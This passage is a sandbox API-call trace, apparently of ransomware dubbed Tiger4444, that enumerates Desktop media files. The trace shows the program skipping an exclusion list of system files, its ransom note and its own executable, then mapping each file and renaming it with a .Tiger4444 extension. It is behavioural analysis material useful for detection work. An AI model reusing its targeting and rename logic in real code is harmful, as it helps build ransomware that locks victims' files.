lstrlenW (lpString="IeLgYQ3Ib.m4a") returned 13 [0049.539] lstrlenW (lpString="Tiger4444") returned 9 [0049.539] lstrcmpiW (lpString1="YQ3Ib.m4a", lpString2="Tiger4444") returned 1 [0049.539] lstrlenW (lpString=".dll") returned 4 [0049.539] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.539] lstrlenW (lpString=".lnk") returned 4 [0049.539] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.539] lstrlenW (lpString=".ini") returned 4 [0049.539] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.539] lstrlenW (lpString=".sys") returned 4 [0049.539] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.540] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\IeLgYQ3Ib.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ielgyq3ib.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.540] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.540] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14099277827) returned 1 [0049.540] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=25186) returned 1 [0049.540] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0049.540] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0049.540] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6570, lpName=0x0) returned 0x2c8 [0049.540] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6570) returned 0xbe0000 [0049.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.541] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.541] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14099409534) returned 1 [0049.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0049.541] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0049.541] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.541] CloseHandle (hObject=0x2c8) returned 1 [0049.541] CloseHandle (hObject=0x260) returned 1 [0049.542] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\IeLgYQ3Ib.m4a.Tiger4444") returned 47 [0049.542] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\IeLgYQ3Ib.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ielgyq3ib.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\IeLgYQ3Ib.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ielgyq3ib.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.542] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d171490, ftCreationTime.dwHighDateTime=0x1d4d35f, ftLastAccessTime.dwLowDateTime=0x710393d0, ftLastAccessTime.dwHighDateTime=0x1d4ce37, ftLastWriteTime.dwLowDateTime=0x710393d0, ftLastWriteTime.dwHighDateTime=0x1d4ce37, nFileSizeHigh=0x0, nFileSizeLow=0x647f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LbV09sOi9q6l_9e3.avi", cAlternateFileName="LBV09S~1.AVI")) returned 1 [0049.542] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.542] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="Tiger4444.exe") returned -1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2=".") returned 1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="..") returned 1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="windows") returned -1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="bootmgr") returned 1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="pagefile.sys") returned -1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="boot") returned 1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="ids.txt") returned 1 [0049.543] lstrcmpiW (lpString1="LbV09sOi9q6l_9e3.avi", lpString2="NTUSER.DAT") returned -1 [0049.543] lstrcpyW (in: lpString1=0x30aead8, lpString2="LbV09sOi9q6l_9e3.avi" | out: lpString1="LbV09sOi9q6l_9e3.avi") returned="LbV09sOi9q6l_9e3.avi" [0049.543] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LbV09sOi9q6l_9e3.avi", dwFileAttributes=0x0) returned 1 [0049.543] lstrlenW (lpString="LbV09sOi9q6l_9e3.avi") returned 20 [0049.543] lstrlenW (lpString="Tiger4444") returned 9 [0049.543] lstrcmpiW (lpString1="l_9e3.avi", lpString2="Tiger4444") returned -1 [0049.543] lstrlenW (lpString=".dll") returned 4 [0049.543] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0049.543] lstrlenW (lpString=".lnk") returned 4 [0049.543] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0049.543] lstrlenW (lpString=".ini") returned 4 [0049.543] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0049.543] lstrlenW (lpString=".sys") returned 4 [0049.543] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0049.543] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LbV09sOi9q6l_9e3.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lbv09soi9q6l_9e3.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.543] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.543] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14099645632) returned 1 [0049.543] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=25727) returned 1 [0049.543] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0049.543] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0049.543] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6780, lpName=0x0) returned 0x2c8 [0049.544] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6780) returned 0xbe0000 [0049.544] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.544] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.544] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.544] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0049.544] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0049.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.545] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14099776776) returned 1 [0049.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0049.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0049.545] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.545] CloseHandle (hObject=0x2c8) returned 1 [0049.545] CloseHandle (hObject=0x260) returned 1 [0049.546] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\LbV09sOi9q6l_9e3.avi.Tiger4444") returned 54 [0049.546] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\LbV09sOi9q6l_9e3.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lbv09soi9q6l_9e3.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\LbV09sOi9q6l_9e3.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\lbv09soi9q6l_9e3.avi.tiger4444"), dwFlags=0x1) returned 1 [0049.546] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b117720, ftCreationTime.dwHighDateTime=0x1d4cd10, ftLastAccessTime.dwLowDateTime=0xa5aaef80, ftLastAccessTime.dwHighDateTime=0x1d4cbb1, ftLastWriteTime.dwLowDateTime=0xa5aaef80, ftLastWriteTime.dwHighDateTime=0x1d4cbb1, nFileSizeHigh=0x0, nFileSizeLow=0x381f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n9ZFDGmU0-yzqmqP0W.m4a", cAlternateFileName="N9ZFDG~1.M4A")) returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="Tiger4444.exe") returned -1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2=".") returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="..") returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="windows") returned -1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="bootmgr") returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="pagefile.sys") returned -1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="boot") returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="ids.txt") returned 1 [0049.546] lstrcmpiW (lpString1="n9ZFDGmU0-yzqmqP0W.m4a", lpString2="NTUSER.DAT") returned -1 [0049.546] lstrcpyW (in: lpString1=0x30aead8, lpString2="n9ZFDGmU0-yzqmqP0W.m4a" | out: lpString1="n9ZFDGmU0-yzqmqP0W.m4a") returned="n9ZFDGmU0-yzqmqP0W.m4a" [0049.546] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\n9ZFDGmU0-yzqmqP0W.m4a", dwFileAttributes=0x0) returned 1 [0049.547] lstrlenW (lpString="n9ZFDGmU0-yzqmqP0W.m4a") returned 22 [0049.547] lstrlenW (lpString="Tiger4444") returned 9 [0049.547] lstrcmpiW (lpString1="mqP0W.m4a", lpString2="Tiger4444") returned -1 [0049.547] lstrlenW (lpString=".dll") returned 4 [0049.547] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.547] lstrlenW (lpString=".lnk") returned 4 [0049.547] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.547] lstrlenW (lpString=".ini") returned 4 [0049.547] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.547] lstrlenW (lpString=".sys") returned 4 [0049.547] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.547] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\n9ZFDGmU0-yzqmqP0W.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\n9zfdgmu0-yzqmqp0w.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.547] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.547] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14100136844) returned 1 [0049.548] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=14367) returned 1 [0049.548] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0049.548] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0049.548] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b20, lpName=0x0) returned 0x2c8 [0049.549] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b20) returned 0xbe0000 [0049.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0049.549] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0049.549] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.549] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0049.549] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.549] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0049.549] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14100254130) returned 1 [0049.549] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0049.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0049.550] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.550] CloseHandle (hObject=0x2c8) returned 1 [0049.550] CloseHandle (hObject=0x260) returned 1 [0049.550] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\n9ZFDGmU0-yzqmqP0W.m4a.Tiger4444") returned 56 [0049.550] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\n9ZFDGmU0-yzqmqP0W.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\n9zfdgmu0-yzqmqp0w.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\n9ZFDGmU0-yzqmqP0W.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\n9zfdgmu0-yzqmqp0w.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.551] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40939090, ftCreationTime.dwHighDateTime=0x1d4c646, ftLastAccessTime.dwLowDateTime=0xcf866250, ftLastAccessTime.dwHighDateTime=0x1d4ca42, ftLastWriteTime.dwLowDateTime=0xcf866250, ftLastWriteTime.dwHighDateTime=0x1d4ca42, nFileSizeHigh=0x0, nFileSizeLow=0x129b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p9t T04.m4a", cAlternateFileName="P9TT04~1.M4A")) returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="Tiger4444.exe") returned -1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2=".") returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="..") returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="windows") returned -1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="bootmgr") returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="pagefile.sys") returned -1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="boot") returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="ids.txt") returned 1 [0049.551] lstrcmpiW (lpString1="p9t T04.m4a", lpString2="NTUSER.DAT") returned 1 [0049.551] lstrcpyW (in: lpString1=0x30aead8, lpString2="p9t T04.m4a" | out: lpString1="p9t T04.m4a") returned="p9t T04.m4a" [0049.551] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\p9t T04.m4a", dwFileAttributes=0x0) returned 1 [0049.551] lstrlenW (lpString="p9t T04.m4a") returned 11 [0049.551] lstrlenW (lpString="Tiger4444") returned 9 [0049.551] lstrcmpiW (lpString1="t T04.m4a", lpString2="Tiger4444") returned -1 [0049.551] lstrlenW (lpString=".dll") returned 4 [0049.551] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.551] lstrlenW (lpString=".lnk") returned 4 [0049.551] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.551] lstrlenW (lpString=".ini") returned 4 [0049.551] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.551] lstrlenW (lpString=".sys") returned 4 [0049.551] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.551] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\p9t T04.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\p9t t04.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.551] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.552] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14100464270) returned 1 [0049.552] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76209) returned 1 [0049.552] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0049.552] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0049.552] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12cc0, lpName=0x0) returned 0x2c8 [0049.552] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12cc0) returned 0xbe0000 [0049.553] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.553] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.553] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.553] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.553] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.554] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14100672905) returned 1 [0049.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0049.554] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0049.554] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.554] CloseHandle (hObject=0x2c8) returned 1 [0049.554] CloseHandle (hObject=0x260) returned 1 [0049.555] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\p9t T04.m4a.Tiger4444") returned 45 [0049.555] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\p9t T04.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\p9t t04.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\p9t T04.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\p9t t04.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.555] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cf62cd0, ftCreationTime.dwHighDateTime=0x1d4d0cc, ftLastAccessTime.dwLowDateTime=0x4a925460, ftLastAccessTime.dwHighDateTime=0x1d4ce01, ftLastWriteTime.dwLowDateTime=0x4a925460, ftLastWriteTime.dwHighDateTime=0x1d4ce01, nFileSizeHigh=0x0, nFileSizeLow=0x102f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pLl2qR-HR2p6.wav", cAlternateFileName="PLL2QR~1.WAV")) returned 1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="Tiger4444.exe") returned -1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2=".") returned 1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="..") returned 1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="windows") returned -1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="bootmgr") returned 1 [0049.555] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="pagefile.sys") returned 1 [0049.556] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="boot") returned 1 [0049.556] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="ids.txt") returned 1 [0049.556] lstrcmpiW (lpString1="pLl2qR-HR2p6.wav", lpString2="NTUSER.DAT") returned 1 [0049.556] lstrcpyW (in: lpString1=0x30aead8, lpString2="pLl2qR-HR2p6.wav" | out: lpString1="pLl2qR-HR2p6.wav") returned="pLl2qR-HR2p6.wav" [0049.556] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\pLl2qR-HR2p6.wav", dwFileAttributes=0x0) returned 1 [0049.556] lstrlenW (lpString="pLl2qR-HR2p6.wav") returned 16 [0049.556] lstrlenW (lpString="Tiger4444") returned 9 [0049.556] lstrcmpiW (lpString1="HR2p6.wav", lpString2="Tiger4444") returned -1 [0049.556] lstrlenW (lpString=".dll") returned 4 [0049.556] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.556] lstrlenW (lpString=".lnk") returned 4 [0049.556] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.556] lstrlenW (lpString=".ini") returned 4 [0049.556] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.556] lstrlenW (lpString=".sys") returned 4 [0049.556] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.556] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\pLl2qR-HR2p6.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\pll2qr-hr2p6.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.556] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.556] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14100928724) returned 1 [0049.556] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=66290) returned 1 [0049.556] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0049.556] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0049.556] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10600, lpName=0x0) returned 0x2c8 [0049.556] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10600) returned 0xbe0000 [0049.559] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.559] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0049.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.559] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0049.559] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0049.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0049.559] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14101219708) returned 1 [0049.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0049.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0049.559] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.560] CloseHandle 